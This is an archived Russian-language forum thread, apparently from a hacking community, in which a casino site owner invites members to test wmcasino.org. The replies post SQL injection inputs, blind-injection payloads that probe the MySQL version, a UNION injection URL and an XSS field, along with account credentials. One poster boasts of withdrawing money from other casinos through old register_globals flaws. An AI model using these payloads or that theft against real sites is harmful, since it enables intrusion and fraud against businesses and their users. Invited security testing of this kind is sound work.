PDA

Просмотр полной версии : Тест wmcasino.org

SPEED2008
03.03.2009, 00:46
Прошу протестировать сайт _http://wmcasino.org/ двиг FREE хоть его и продают барыги псевдо разрабы... НО несмотря на это все уязвимости заявленные на форумах и пр... были залатаны, добавлено много своего... Самописом назвать язык не повернётся, но и сказать что я типо токо диз сменил в этом скрипте это будет не верно...

Серьёзные дыры прошу публиковать под большим хайдом или как тут принято... + ко мне в осику на обсуждение... за инфу естественно плачу $

ICQ 357-350
sboy20042
03.03.2009, 22:28
SQL-inj
http://wmcasino.org/lobby/login.php
login: '
password: любой
Rubaka
03.03.2009, 22:58
Поле login немного бажное!
http://wmcasino.org/lobby/login_proc.php?log=%27+union+select+1,2,3,4,5,6,7, 8,9,0,1,2,3,4,5+limit+1,1/*&psw=&submit=%C2%EE%E9%F2%E8&send=1
идет редирект на главн страницу
хз чо с ним делать ((
oRb
03.03.2009, 23:09
Немного уточню, тк сидел раскручивал:
' and 1=if((select substring(version(),1,1)=4),1,(select 1 from information_schema.tables))/*
' and 1=if((select substring(version(),1,1)=5),1,(select 1 from information_schema.tables))/*

=> 5й мускул с доступом к information_schema.

XSS
http://wmcasino.org/lobby/generate.php
Поле frmName
Если нет привязки сессии к ип и не чекается реферер, тогда это можно отнести к уязвимости.
SPEED2008
03.03.2009, 23:54
SQL-inj
http://wmcasino.org/lobby/login.php
login: '
password: любой


ЗалаталсО
SPEED2008
04.03.2009, 00:08
Немного уточню, тк сидел раскручивал:
' and 1=if((select substring(version(),1,1)=4),1,(select 1 from information_schema.tables))/*
' and 1=if((select substring(version(),1,1)=5),1,(select 1 from information_schema.tables))/*

=> 5й мускул с доступом к information_schema.

XSS
http://wmcasino.org/lobby/generate.php
Поле frmName
Если нет привязки сессии к ип и не чекается реферер, тогда это можно отнести к уязвимости.

Так же залаталсО
Ponchik
06.03.2009, 12:21
т.к. ТС ппц просто, я ему в репу отписал он всёравно акк не дал, нате
wmcasino:wmcasino
<offtop>Дыры не искал но казино мну ненравица</offtop>
SPEED2008
07.03.2009, 12:09
т.к. ТС ппц просто, я ему в репу отписал он всёравно акк не дал, нате
wmcasino:wmcasino
<offtop>Дыры не искал но казино мну ненравица</offtop>

Ничё не понял... Ты типо попрасил у мну акк в казино, а я отказал? Баян какой-то...

Логин antichat
Пароль antichat
WMR 100
FUN 1000

Тестируйте...


Надеюсь у тебя register_globals=off, помню при включеном там было половину игр уязвимо, выводил из десятка казино по 200-300 рублей, сцуки так должны и остались.

Если ты Б3 с граббы, то тебе ли не знать про register_globals= и про дыры в играх которые я тебе показал... не так ли :-)

register_globals=ON
Игры от этого переписаны все.
Баги 2005 года так же залатаны...


Тестируйте кому не лень тратить свой время...
SPEED2008
08.03.2009, 03:56
Ха ха оч. смешно...

636 antichat 4.00 WebMoney R146881636470 96 р Оплатить - в оплате отказано

Зачем вывод делать, когда это было для теста начислено...